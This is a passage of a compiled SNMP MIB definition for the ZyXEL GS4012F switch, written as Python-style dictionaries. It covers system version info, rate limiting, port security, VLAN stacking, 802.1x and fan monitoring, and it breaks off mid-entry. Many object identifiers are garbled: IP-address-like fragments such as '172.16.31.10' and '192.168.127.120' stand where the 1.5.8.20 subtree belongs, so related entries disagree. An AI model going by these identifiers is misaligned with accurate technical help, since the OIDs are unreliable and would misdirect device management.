{"module" : "SNMPv2-TC", "name" : "MacAddress"},
{"module" : "RFC1213-MIB", "name" : "DisplayString"},
{"module" : "P-BRIDGE-MIB", "name" : "EnabledStatus"},
{"module" : "Q-BRIDGE-MIB", "name" : "PortList"},
{"module" : "BRIDGE-MIB", "name" : "dot1dBasePort"},
{"module" : "IF-MIB", "name" : "InterfaceIndexOrZero"},
{"module" : "SNMP-FRAMEWORK-MIB", "name" : "SnmpAdminString"},
{"module" : "INET-ADDRESS-MIB", "name" : "InetAddressType"},
{"module" : "INET-ADDRESS-MIB", "name" : "InetAddress"},
{"module" : "DISMAN-PING-MIB", "name" : "OperationResponseStatus"},
{"module" : "OSPF-MIB", "name" : "ospfIfIpAddress"},
{"module" : "OSPF-MIB", "name" : "ospfAddressLessIf"},
{"module" : "OSPF-MIB", "name" : "ospfAreaId"},
{"module" : "OSPF-MIB", "name" : "ospfNbrIpAddr"},
{"module" : "OSPF-MIB", "name" : "ospfNbrAddressLessIndex"},
{"module" : "OSPF-MIB", "name" : "ospfLsdbAreaId"},
{"module" : "OSPF-MIB", "name" : "ospfLsdbType"},
{"module" : "OSPF-MIB", "name" : "ospfLsdbLSID"},
{"module" : "OSPF-MIB", "name" : "ospfLsdbRouterId"},
{"module" : "OSPF-MIB", "name" : "ospfVirtIfAreaID"},
{"module" : "OSPF-MIB", "name" : "ospfVirtIfNeighbor"},
{"module" : "BRIDGE-MIB", "name" : "BridgeId"},
{"module" : "BRIDGE-MIB", "name" : "Timeout"},
),
"typedefs" : {
"UtcTimeStamp" : {
"basetype" : "Unsigned32",
"status" : "current",
"description" :
"""Universal Time Coordinated as a 32-bit value that designates
the number of seconds since Jan 1, 1970 12:00AM.""",
},
"EventIdNumber" : {
"basetype" : "Integer32",
"status" : "current",
"description" :
"""This textual convention describes the index that uniquely
identifies a fault event type in the entire system. Every fault
event type, e.g. link down, has a unique EventIdNumber.""",
},
"EventSeverity" : {
"basetype" : "Enumeration",
"status" : "current",
"critical" : {
"nodetype" : "namednumber",
"number" : "1"
},
"major" : {
"nodetype" : "namednumber",
"number" : "2"
},
"minor" : {
"nodetype" : "namednumber",
"number" : "3"
},
"informational" : {
"nodetype" : "namednumber",
"number" : "4"
},
"description" :
"""This textual convention describes the severity of a fault event.
The decreasing order of severity is shown in the textual
convention.""",
},
"EventServiceAffective" : {
"basetype" : "Enumeration",
"status" : "current",
"noServiceAffected" : {
"nodetype" : "namednumber",
"number" : "1"
},
"serviceAffected" : {
"nodetype" : "namednumber",
"number" : "2"
},
"description" :
"""This textual convention indicates whether an event is immediately
service affecting or not.""",
},
"InstanceType" : {
"basetype" : "Enumeration",
"status" : "current",
"unknown" : {
"nodetype" : "namednumber",
"number" : "1"
},
"node" : {
"nodetype" : "namednumber",
"number" : "2"
},
"shelf" : {
"nodetype" : "namednumber",
"number" : "3"
},
"line" : {
"nodetype" : "namednumber",
"number" : "4"
},
"switch" : {
"nodetype" : "namednumber",
"number" : "5"
},
"lsp" : {
"nodetype" : "namednumber",
"number" : "6"
},
"l2Interface" : {
"nodetype" : "namednumber",
"number" : "7"
},
"l3Interface" : {
"nodetype" : "namednumber",
"number" : "8"
},
"rowIndex" : {
"nodetype" : "namednumber",
"number" : "9"
},
"description" :
"""This textual convention describes the type of an instanceId
associated with each event and by that means specifies how
the instanceId variable should be intepreted.
Various instanceId types are specified below to enable fault
monitoring for different kind of devices from fixed
configuration pizza boxes to multi chassis nodes. All
instanceId types may not need to be used in every device
type.
Note also that instanceId semantics are element type dependent
(e.g. different kind of interface naming conventions may be used)
and thus instanceId usage may vary from element to element.
=========================================================================
Type Description Example form
of InstanceId
=========================================================================
unknown (1) unknown type - Irrelevant-
-------------------------------------------------------------------------
node (2) Associated with events originating from 1
the node. Used for general events that (Node number)
can not be associated with any specific
block. InstanceId value 1 is used for
single node equipment.
-------------------------------------------------------------------------
shelf (3) Associated with events originating from 1
the shelf. In the case of fixed (shelf number)
configuration devices this type is used
for events that are associated with the
physical enclosure, e.g. faults related
to fan etc. InstanceId value 1 is used
for single self equipment.
-------------------------------------------------------------------------
line (4) Associated with events originating from
physical interfaces or associated
components such as line cards.
InstanceId usage examples for faults
originating from:
- Physical port: Simply port number, e.g. .......1
-------------------------------------------------------------------------
switch (5) Associated with events originating from 1
from a switch chip or a switch card. (switch number)
For single switch equipment InstanceId
value 1 is used, for multi swich nodes
InstanceId semantics if for further
study.
-------------------------------------------------------------------------
lsp (6) Associated with events originating from 1
a particular lsp. (lsp index)
NOTE: In this case the InstanceName
contains the lsp name and InstanceId
contains lsp index.
-------------------------------------------------------------------------
l2Interface(7) Associated with events originating from - TBD -
a particular layer 2 interface. Used for
layer 2 related events such as L2 control
protocol faults. InstanceId semantics is
for further study.
-------------------------------------------------------------------------
l3Interface(8) Associated with events originating from - TBD -
a particular layer 3 interface. Used for
layer 3 related events such as L3 control
protocol faults. InstanceId semantics is
for further study.
-------------------------------------------------------------------------
rowIndex (9) Associated with events reporting about a
'logical' or conceptual table that consists
of rows. The Instance Id is the index/key
for a row in the table. The format of the
Instance Id will simply be a series of decimal
numbers seperated by a '.':
=========================================================================""",
},
"EventPersistence" : {
"basetype" : "Enumeration",
"status" : "current",
"normal" : {
"nodetype" : "namednumber",
"number" : "1"
},
"delta" : {
"nodetype" : "namednumber",
"number" : "2"
},
"description" :
"""This textual convention indicates whether the event is delta
(automatically and immediately cleared) or normal (not
automatically cleared).""",
},
"MstiOrCistInstanceIndex" : {
"basetype" : "Integer32",
"status" : "current",
"ranges" : [
{
"min" : "0",
"max" : "16"
},
],
"range" : {
"min" : "0",
"max" : "16"
},
"description" :
"""This textual convention is an extension of the
MstiInstanceIndex convention. This extension permits the
additional value of zero, which means Common and Internal
Spanning Tree (CIST).""",
},
}, # typedefs
"nodes" : {
"zyxel" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890",
}, # node
"products" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1",
}, # node
"accessSwitch" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5",
}, # node
"esSeries" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8",
}, # node
"gs4012f" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10",
}, # node
"sysInfo" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.1",
}, # node
"sysSwPlatformMajorVers" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""SW platform major version, e.g. 3.""",
}, # scalar
"sysSwPlatformMinorVers" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""SW platform minor version, e.g. 50.""",
}, # scalar
"sysSwModelString" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readonly",
"description" :
"""Model letters, e.g. TJ""",
}, # scalar
"sysSwVersionControlNbr" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.1.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""Version control number, e.g. 0.""",
}, # scalar
"sysSwDay" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.1.5",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""SW compilation day, e.g. 19.""",
}, # scalar
"sysSwMonth" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.1.6",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""SW compilation month, e.g. 8.""",
}, # scalar
"sysSwYear" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.1.7",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""SW compilation year, e.g. 2004.""",
}, # scalar
"sysHwMajorVers" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.1.8",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""HW major version number, e.g. 1.""",
}, # scalar
"sysHwMinorVers" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.1.9",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""HW minor version number, e.g. 0.""",
}, # scalar
"sysSerialNumber" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.1.10",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readonly",
"description" :
"""Serial number""",
}, # scalar
"rateLimitSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.2",
}, # node
"rateLimitState" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.2.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""Ingress/egress rate limiting enabled/disabled for the switch.""",
}, # scalar
"rateLimitPortTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.2.2",
"status" : "current",
"description" :
"""""",
}, # table
"rateLimitPortEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.2.2.1",
"status" : "current",
"linkage" : [
"dot1dBasePort",
],
"description" :
"""An entry in rateLimitPortTable.""",
}, # row
"rateLimitPortState" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.2.2.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""Ingress/egress rate limiting enabled/disabled on the port.""",
}, # column
"rateLimitPortCommitRate" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.2.2.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""Commit rate in Kbit/s. The range of FE port is between 0 and 100,000. For GE port, the range is between 0 and 1000,000.""",
}, # column
"rateLimitPortPeakRate" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.2.2.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""Peak rate in Kbit/s. The range of FE port is between 1 and 100,000. For GE port, the range is between 1 and 1000,000.""",
}, # column
"rateLimitPortEgrRate" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.2.2.1.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""Egress rate in Mbit/s. The granularity of FE port is between 1 and 100. For GE port, the granularity is between 1 and 1000.""",
}, # column
"rateLimitPortPeakState" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.2.2.1.5",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""Ingress peak rate limiting enabled/disabled on the port.""",
}, # column
"rateLimitPortEgrState" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.2.2.1.6",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""Egress rate limiting enabled/disabled on the port.""",
}, # column
"rateLimitPortCommitState" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.2.2.1.7",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""Ingress commit rate limiting enabled/disabled on the port.""",
}, # column
"brLimitSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.3",
}, # node
"brLimitState" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.3.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""Broadcast/multicast/DLF rate limiting enabled/disabled for the switch.""",
}, # scalar
"brLimitPortTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.192.168.127.120.3.2",
"status" : "current",
"description" :
"""""",
}, # table
"brLimitPortEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.3.2.1",
"status" : "current",
"linkage" : [
"dot1dBasePort",
],
"description" :
"""An entry in brLimitPortTable.""",
}, # row
"brLimitPortBrState" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.3.2.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""Broadcast rate limiting enabled/disabled on the port.""",
}, # column
"brLimitPortBrRate" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.3.2.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""Allowed broadcast rate in pkts/s. For FE port,
the maximum value is 148800. For GE port, the maximum value is 262143.""",
}, # column
"brLimitPortMcState" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.3.2.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""Multicast rate limiting enabled/disabled on the port.""",
}, # column
"brLimitPortMcRate" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.3.2.1.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""AAllowed mullticast rate in pkts/s. For FE port,
the maximum value is 148800. For GE port, the maximum value is 262143.""",
}, # column
"brLimitPortDlfState" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.3.2.1.5",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""Destination lookup failure frames rate limiting enabled/disabled on the port.""",
}, # column
"brLimitPortDlfRate" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.3.2.1.6",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""Allowed destination lookup failure frames rate in pkts/s.
For FE port, the maximum value is 148800. For GE port, the maximum value is 262143.""",
}, # column
"portSecuritySetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.4",
}, # node
"portSecurityState" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.4.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"portSecurityPortTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.4.2",
"status" : "current",
"description" :
"""""",
}, # table
"portSecurityPortEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.4.2.1",
"status" : "current",
"linkage" : [
"dot1dBasePort",
],
"description" :
"""An entry in portSecurityPortTable.""",
}, # row
"portSecurityPortState" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.4.2.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""Port Security enabled/disabled on the port.
Active(1) means this port only accept frames from static MAC addresses that are configured for the port,
and dynamic MAC address frames up to the number specified by portSecurityPortCount object.""",
}, # column
"portSecurityPortLearnState" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.4.2.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""MAC address learning enabled/disable on the port.""",
}, # column
"portSecurityPortCount" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.4.2.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""Number of (dynamic) MAC addresses that may be learned on the port.""",
}, # column
"portSecurityMacFreeze" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.4.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"Q-BRIDGE-MIB", "name" : "PortList"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"vlanTrunkSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.5",
}, # node
"vlanTrunkPortTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.5.1",
"status" : "current",
"description" :
"""""",
}, # table
"vlanTrunkPortEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.5.1.1",
"status" : "current",
"linkage" : [
"dot1dBasePort",
],
"description" :
"""An entry in vlanTrunkPortTable.""",
}, # row
"vlanTrunkPortState" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.5.1.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""VlanTrunking enabled/disabled on the port.
Active(1) to allow frames belonging to unknown
VLAN groups to pass through the switch.""",
}, # column
"ctlProtTransSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.6",
}, # node
"ctlProtTransState" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.6.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""Bridge control protocol transparency enabled/disabled for the switch""",
}, # scalar
"ctlProtTransTunnelPortTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.6.2",
"status" : "current",
"description" :
"""""",
}, # table
"ctlProtTransTunnelPortEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.6.2.1",
"status" : "current",
"linkage" : [
"dot1dBasePort",
],
"description" :
"""An entry in ctlProtTransTunnelPortTable.""",
}, # row
"ctlProtTransTunnelMode" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.6.2.1.1",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"peer" : {
"nodetype" : "namednumber",
"number" : "0"
},
"tunnel" : {
"nodetype" : "namednumber",
"number" : "1"
},
"discard" : {
"nodetype" : "namednumber",
"number" : "2"
},
"network" : {
"nodetype" : "namednumber",
"number" : "3"
},
},
},
"access" : "readwrite",
"description" :
"""Bridge control protocol transparency mode for the port.
Modes: Peer(0), Tunnel(1), Discard(2), Network(3)""",
}, # column
"vlanStackSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.7",
}, # node
"vlanStackState" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.172.16.58.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""VLAN Stacking enabled/disabled for the switch.""",
}, # scalar
"vlanStackTpid" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.7.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""SP TPID in hex format, e.g. 8100.""",
}, # scalar
"vlanStackPortTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.7.3",
"status" : "current",
"description" :
"""""",
}, # table
"vlanStackPortEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.7.3.1",
"status" : "current",
"linkage" : [
"dot1dBasePort",
],
"description" :
"""An entry in vlanStackPortTable.""",
}, # row
"vlanStackPortMode" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.7.3.1.1",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"normal" : {
"nodetype" : "namednumber",
"number" : "1"
},
"access" : {
"nodetype" : "namednumber",
"number" : "2"
},
"tunnel" : {
"nodetype" : "namednumber",
"number" : "3"
},
},
},
"access" : "readwrite",
"description" :
"""Mode of the port.Set Access mode to have the switch add the SP TPID tag to all incoming
frames received on this port. Set Access mode for ingress ports at the
edge of the service provider's network. Set Tunnel mode (available for
Gigabit ports only) for egress ports at the edge of the service provider's
network. In order to support VLAN stacking on a port, the port must be able
to allow frames of 1526 Bytes (1522 Bytes + 4 Bytes for the second tag)
to pass through it. Access (0), tunnel (1)""",
}, # column
"vlanStackPortVid" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.192.168.127.120.7.3.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""VLAN ID used in service provider tag.""",
}, # column
"vlanStackPortPrio" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.192.168.127.120.7.3.1.3",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"prioriry-0" : {
"nodetype" : "namednumber",
"number" : "0"
},
"prioriry-1" : {
"nodetype" : "namednumber",
"number" : "1"
},
"prioriry-2" : {
"nodetype" : "namednumber",
"number" : "2"
},
"prioriry-3" : {
"nodetype" : "namednumber",
"number" : "3"
},
"prioriry-4" : {
"nodetype" : "namednumber",
"number" : "4"
},
"prioriry-5" : {
"nodetype" : "namednumber",
"number" : "5"
},
"prioriry-6" : {
"nodetype" : "namednumber",
"number" : "6"
},
"prioriry-7" : {
"nodetype" : "namednumber",
"number" : "7"
},
},
},
"access" : "readwrite",
"description" :
"""Priority value for service provider tag.
0 is the lowest priority level and 7 is the highest.""",
}, # column
"dot1xSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.8",
}, # node
"portAuthState" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.8.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""802.1x port authentication enabled/disabled for the switch.""",
}, # scalar
"portAuthTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.192.168.127.120.8.4",
"status" : "current",
"description" :
"""""",
}, # table
"portAuthEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.192.168.127.120.8.4.1",
"status" : "current",
"linkage" : [
"dot1dBasePort",
],
"description" :
"""An entry in portAuthTable.""",
}, # row
"portAuthEntryState" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.8.4.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""802.1x port authentication enabled or disabled on the port.""",
}, # column
"portReAuthEntryState" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.192.168.127.120.8.4.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""802.1x port re-authentication enabled or disabled on the port.""",
}, # column
"portReAuthEntryTimer" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.8.4.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""Re-authentication timer in seconds.""",
}, # column
"hwMonitorInfo" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.9",
}, # node
"fanRpmTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.9.1",
"status" : "current",
"description" :
"""""",
}, # table
"fanRpmEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.9.1.1",
"status" : "current",
"linkage" : [
"fanRpmIndex",
],
"description" :
"""An entry in fanRpmTable.""",
}, # row
"fanRpmIndex" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.9.1.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""Index of FAN.""",
}, # column
"fanRpmCurValue" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.9.1.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""Current speed in Revolutions Per Minute (RPM) on the fan.""",
}, # column
"fanRpmMaxValue" : {
"nodetype" : "column",
